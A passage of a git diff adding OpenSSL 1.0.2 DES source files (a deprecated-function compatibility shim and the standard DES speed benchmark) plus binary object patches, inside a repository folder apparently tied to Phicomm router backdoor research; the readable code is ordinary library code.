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
JG>;+s{|$x2a$Eoa

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.c
new file mode 100644
index 0000000..f7d28a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.c
@@ -0,0 +1,80 @@
+/* crypto/des/des_old.c -*- mode:C; c-file-style: "eay" -*- */
+
+/*
+ * WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING The
+ * function names in here are deprecated and are only present to provide an
+ * interface compatible with OpenSSL 0.9.6c.  OpenSSL now provides functions
+ * where "des_" has been replaced with "DES_" in the names, to make it
+ * possible to make incompatible changes that are needed for C type security
+ * and other stuff. Please consider starting to use the DES_ functions
+ * rather than the des_ ones.  The des_ functions will dissapear completely
+ * before OpenSSL 1.0! WARNING WARNING WARNING WARNING WARNING WARNING
+ * WARNING WARNING
+ */
+
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#undef OPENSSL_DES_LIBDES_COMPATIBILITY
+#include <openssl/des.h>
+#include <openssl/rand.h>
+
+void _ossl_096_des_random_seed(DES_cblock *key)
+{
+    RAND_seed(key, sizeof(DES_cblock));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old2.o
new file mode 100644
index 0000000000000000000000000000000000000000..2d8e7e08c8572f9ee477e983b20886b628d0314b
GIT binary patch
literal 1560
zcmbu8UuzRV5Wwep)mDwR6(59(+><EU<x-2<B9gQw0ST$p_EDBgZZ%-;uH0>)@j?9v
zegr>>_z`^cEBL1PCPJOr+if=6(+3@xotfXw?4Q}ax2<k_&hx;C2ajMH84B=aZt6Fb
z+klHugC9%Re|}s<@KwRi&dyeF^PoRY<v7@6cUibrzdu%C{mpvF!i`%cR@perqb{SK
zLGAPo0GIhh%ts};QX24H?}2x;?5)-o7T@CriC@#-E@}HWLuZ<Y@5fa+e&va24`vs$
zRleHwEThPWv!|ir3xD9$xYOdRZp`u;hL^2<nls-(PW^M`A%ZFnu_$;pir3iycvci6
z9&X;_1oJ43vxFBy#K1e<-R)+V@3z~|TKjyzx!rAX*lYG4m)`-->jmkqE};H8E+x>M
zo{RNl09Y|eWYkA1^U@BDmy1!vq&Skm;z&lo`b7b3kR^#ok)@dw4By6DA)~=79luP+
z>@d#`MJ^}6)C^+CU*u6D^bY>d1XxaQ#=X%7G7{7OGAeV8Pj(fRdecC)<$-R>RSl_+
zw2pZRhSR+gcVA!+S(Q+(Eq5@WIsdi3j<qyrh-!;j|F#X$H|ra_WidN-Vh5IQ>I`~<
z4*fMVZwTXes3d_Jr-SLAA$@dcPPhJpPH@lV)<4I*s{4Cdaeq{6>dpOCtxZdRrU50;
n2d01L9I9JS%)L8A@J-jXDX>K26S9I{RsB%!e{_;rI&S@M9!6(M

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_opts.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_opts.c
new file mode 100644
index 0000000..ec50e94
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_opts.c
@@ -0,0 +1,641 @@
+/* crypto/des/des_opts.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * define PART1, PART2, PART3 or PART4 to build only with a few of the
+ * options. This is for machines with 64k code segment size restrictions.
+ */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+#ifndef OPENSSL_SYS_MSDOS
+# include <openssl/e_os2.h>
+# include OPENSSL_UNISTD
+#else
+# include <io.h>
+extern void exit();
+#endif
+
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+
+/*
+ * Depending on the VMS version, the tms structure is perhaps defined. The
+ * __TMS macro will show if it was.  If it wasn't defined, we should undefine
+ * TIMES, since that tells the rest of the program how things should be
+ * handled.  -- Richard Levitte
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+
+#include <openssl/des.h>
+#include "spr.h"
+
+#define DES_DEFAULT_OPTIONS
+
+#if !defined(PART1) && !defined(PART2) && !defined(PART3) && !defined(PART4)
+# define PART1
+# define PART2
+# define PART3
+# define PART4
+#endif
+
+#ifdef PART1
+
+# undef DES_UNROLL
+# undef DES_RISC1
+# undef DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# define DES_encrypt1 des_encrypt_u4_cisc_idx
+# define DES_encrypt2 des_encrypt2_u4_cisc_idx
+# define DES_encrypt3 des_encrypt3_u4_cisc_idx
+# define DES_decrypt3 des_decrypt3_u4_cisc_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# undef DES_RISC1
+# undef DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_cisc_idx
+# define DES_encrypt2 des_encrypt2_u16_cisc_idx
+# define DES_encrypt3 des_encrypt3_u16_cisc_idx
+# define DES_decrypt3 des_decrypt3_u16_cisc_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# undef DES_UNROLL
+# define DES_RISC1
+# undef DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u4_risc1_idx
+# define DES_encrypt2 des_encrypt2_u4_risc1_idx
+# define DES_encrypt3 des_encrypt3_u4_risc1_idx
+# define DES_decrypt3 des_decrypt3_u4_risc1_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+#endif
+
+#ifdef PART2
+
+# undef DES_UNROLL
+# undef DES_RISC1
+# define DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u4_risc2_idx
+# define DES_encrypt2 des_encrypt2_u4_risc2_idx
+# define DES_encrypt3 des_encrypt3_u4_risc2_idx
+# define DES_decrypt3 des_decrypt3_u4_risc2_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# define DES_RISC1
+# undef DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_risc1_idx
+# define DES_encrypt2 des_encrypt2_u16_risc1_idx
+# define DES_encrypt3 des_encrypt3_u16_risc1_idx
+# define DES_decrypt3 des_decrypt3_u16_risc1_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# undef DES_RISC1
+# define DES_RISC2
+# undef DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_risc2_idx
+# define DES_encrypt2 des_encrypt2_u16_risc2_idx
+# define DES_encrypt3 des_encrypt3_u16_risc2_idx
+# define DES_decrypt3 des_decrypt3_u16_risc2_idx
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+#endif
+
+#ifdef PART3
+
+# undef DES_UNROLL
+# undef DES_RISC1
+# undef DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u4_cisc_ptr
+# define DES_encrypt2 des_encrypt2_u4_cisc_ptr
+# define DES_encrypt3 des_encrypt3_u4_cisc_ptr
+# define DES_decrypt3 des_decrypt3_u4_cisc_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# undef DES_RISC1
+# undef DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_cisc_ptr
+# define DES_encrypt2 des_encrypt2_u16_cisc_ptr
+# define DES_encrypt3 des_encrypt3_u16_cisc_ptr
+# define DES_decrypt3 des_decrypt3_u16_cisc_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# undef DES_UNROLL
+# define DES_RISC1
+# undef DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u4_risc1_ptr
+# define DES_encrypt2 des_encrypt2_u4_risc1_ptr
+# define DES_encrypt3 des_encrypt3_u4_risc1_ptr
+# define DES_decrypt3 des_decrypt3_u4_risc1_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+#endif
+
+#ifdef PART4
+
+# undef DES_UNROLL
+# undef DES_RISC1
+# define DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u4_risc2_ptr
+# define DES_encrypt2 des_encrypt2_u4_risc2_ptr
+# define DES_encrypt3 des_encrypt3_u4_risc2_ptr
+# define DES_decrypt3 des_decrypt3_u4_risc2_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# define DES_RISC1
+# undef DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_risc1_ptr
+# define DES_encrypt2 des_encrypt2_u16_risc1_ptr
+# define DES_encrypt3 des_encrypt3_u16_risc1_ptr
+# define DES_decrypt3 des_decrypt3_u16_risc1_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+# define DES_UNROLL
+# undef DES_RISC1
+# define DES_RISC2
+# define DES_PTR
+# undef D_ENCRYPT
+# undef DES_encrypt1
+# undef DES_encrypt2
+# undef DES_encrypt3
+# undef DES_decrypt3
+# define DES_encrypt1 des_encrypt_u16_risc2_ptr
+# define DES_encrypt2 des_encrypt2_u16_risc2_ptr
+# define DES_encrypt3 des_encrypt3_u16_risc2_ptr
+# define DES_decrypt3 des_decrypt3_u16_risc2_ptr
+# undef HEADER_DES_LOCL_H
+# include "des_enc.c"
+
+#endif
+
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD fix */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1000.0;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+#ifdef SIGALRM
+# define print_name(name) fprintf(stderr,"Doing %s's for 10 seconds\n",name); alarm(10);
+#else
+# define print_name(name) fprintf(stderr,"Doing %s %ld times\n",name,cb);
+#endif
+
+#define time_it(func,name,index) \
+        print_name(name); \
+        Time_F(START); \
+        for (count=0,run=1; COND(cb); count++) \
+                { \
+                unsigned long d[2]; \
+                func(d,&sch,DES_ENCRYPT); \
+                } \
+        tm[index]=Time_F(STOP); \
+        fprintf(stderr,"%ld %s's in %.2f second\n",count,name,tm[index]); \
+        tm[index]=((double)COUNT(cb))/tm[index];
+
+#define print_it(name,index) \
+        fprintf(stderr,"%s bytes per sec = %12.2f (%5.1fuS)\n",name, \
+                tm[index]*8,1.0e6/tm[index]);
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static DES_cblock key =
+        { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0 };
+    static DES_cblock key2 =
+        { 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
+    static DES_cblock key3 =
+        { 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34 };
+    DES_key_schedule sch, sch2, sch3;
+    double d, tm[16], max = 0;
+    int rank[16];
+    char *str[16];
+    int max_idx = 0, i, num = 0, j;
+#ifndef SIGALARM
+    long ca, cb, cc, cd, ce;
+#endif
+
+    for (i = 0; i < 12; i++) {
+        tm[i] = 0.0;
+        rank[i] = 0;
+    }
+
+#ifndef TIMES
+    fprintf(stderr, "To get the most accurate results, try to run this\n");
+    fprintf(stderr, "program when this computer is idle.\n");
+#endif
+
+    DES_set_key_unchecked(&key, &sch);
+    DES_set_key_unchecked(&key2, &sch2);
+    DES_set_key_unchecked(&key3, &sch3);
+
+#ifndef SIGALRM
+    fprintf(stderr, "First we calculate the approximate speed ...\n");
+    DES_set_key_unchecked(&key, sch);
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            DES_encrypt1(data, &(sch[0]), DES_ENCRYPT);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count;
+    cb = count * 3;
+    cc = count * 3 * 8 / BUFSIZE + 1;
+    cd = count * 8 / BUFSIZE + 1;
+
+    ce = count / 20 + 1;
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    alarm(10);
+#endif
+
+#ifdef PART1
+    time_it(des_encrypt_u4_cisc_idx, "des_encrypt_u4_cisc_idx  ", 0);
+    time_it(des_encrypt_u16_cisc_idx, "des_encrypt_u16_cisc_idx ", 1);
+    time_it(des_encrypt_u4_risc1_idx, "des_encrypt_u4_risc1_idx ", 2);
+    num += 3;
+#endif
+#ifdef PART2
+    time_it(des_encrypt_u16_risc1_idx, "des_encrypt_u16_risc1_idx", 3);
+    time_it(des_encrypt_u4_risc2_idx, "des_encrypt_u4_risc2_idx ", 4);
+    time_it(des_encrypt_u16_risc2_idx, "des_encrypt_u16_risc2_idx", 5);
+    num += 3;
+#endif
+#ifdef PART3
+    time_it(des_encrypt_u4_cisc_ptr, "des_encrypt_u4_cisc_ptr  ", 6);
+    time_it(des_encrypt_u16_cisc_ptr, "des_encrypt_u16_cisc_ptr ", 7);
+    time_it(des_encrypt_u4_risc1_ptr, "des_encrypt_u4_risc1_ptr ", 8);
+    num += 3;
+#endif
+#ifdef PART4
+    time_it(des_encrypt_u16_risc1_ptr, "des_encrypt_u16_risc1_ptr", 9);
+    time_it(des_encrypt_u4_risc2_ptr, "des_encrypt_u4_risc2_ptr ", 10);
+    time_it(des_encrypt_u16_risc2_ptr, "des_encrypt_u16_risc2_ptr", 11);
+    num += 3;
+#endif
+
+#ifdef PART1
+    str[0] = " 4  c i";
+    print_it("des_encrypt_u4_cisc_idx  ", 0);
+    max = tm[0];
+    max_idx = 0;
+    str[1] = "16  c i";
+    print_it("des_encrypt_u16_cisc_idx ", 1);
+    if (max < tm[1]) {
+        max = tm[1];
+        max_idx = 1;
+    }
+    str[2] = " 4 r1 i";
+    print_it("des_encrypt_u4_risc1_idx ", 2);
+    if (max < tm[2]) {
+        max = tm[2];
+        max_idx = 2;
+    }
+#endif
+#ifdef PART2
+    str[3] = "16 r1 i";
+    print_it("des_encrypt_u16_risc1_idx", 3);
+    if (max < tm[3]) {
+        max = tm[3];
+        max_idx = 3;
+    }
+    str[4] = " 4 r2 i";
+    print_it("des_encrypt_u4_risc2_idx ", 4);
+    if (max < tm[4]) {
+        max = tm[4];
+        max_idx = 4;
+    }
+    str[5] = "16 r2 i";
+    print_it("des_encrypt_u16_risc2_idx", 5);
+    if (max < tm[5]) {
+        max = tm[5];
+        max_idx = 5;
+    }
+#endif
+#ifdef PART3
+    str[6] = " 4  c p";
+    print_it("des_encrypt_u4_cisc_ptr  ", 6);
+    if (max < tm[6]) {
+        max = tm[6];
+        max_idx = 6;
+    }
+    str[7] = "16  c p";
+    print_it("des_encrypt_u16_cisc_ptr ", 7);
+    if (max < tm[7]) {
+        max = tm[7];
+        max_idx = 7;
+    }
+    str[8] = " 4 r1 p";
+    print_it("des_encrypt_u4_risc1_ptr ", 8);
+    if (max < tm[8]) {
+        max = tm[8];
+        max_idx = 8;
+    }
+#endif
+#ifdef PART4
+    str[9] = "16 r1 p";
+    print_it("des_encrypt_u16_risc1_ptr", 9);
+    if (max < tm[9]) {
+        max = tm[9];
+        max_idx = 9;
+    }
+    str[10] = " 4 r2 p";
+    print_it("des_encrypt_u4_risc2_ptr ", 10);
+    if (max < tm[10]) {
+        max = tm[10];
+        max_idx = 10;
+    }
+    str[11] = "16 r2 p";
+    print_it("des_encrypt_u16_risc2_ptr", 11);
+    if (max < tm[11]) {
+        max = tm[11];
+        max_idx = 11;
+    }
+#endif
+    printf("options    des ecb/s\n");
+    printf("%s %12.2f 100.0%%\n", str[max_idx], tm[max_idx]);
+    d = tm[max_idx];
+    tm[max_idx] = -2.0;
+    max = -1.0;
+    for (;;) {
+        for (i = 0; i < 12; i++) {
+            if (max < tm[i]) {
+                max = tm[i];
+                j = i;
+            }
+        }
+        if (max < 0.0)
+            break;
+        printf("%s %12.2f  %4.1f%%\n", str[j], tm[j], tm[j] / d * 100.0);
+        tm[j] = -2.0;
+        max = -1.0;
+    }
+
+    switch (max_idx) {
+    case 0:
+        printf("-DDES_DEFAULT_OPTIONS\n");
+        break;
+    case 1:
+        printf("-DDES_UNROLL\n");
+        break;
+    case 2:
+        printf("-DDES_RISC1\n");
+        break;
+    case 3:
+        printf("-DDES_UNROLL -DDES_RISC1\n");
+        break;
+    case 4:
+        printf("-DDES_RISC2\n");
+        break;
+    case 5:
+        printf("-DDES_UNROLL -DDES_RISC2\n");
+        break;
+    case 6:
+        printf("-DDES_PTR\n");
+        break;
+    case 7:
+        printf("-DDES_UNROLL -DDES_PTR\n");
+        break;
+    case 8:
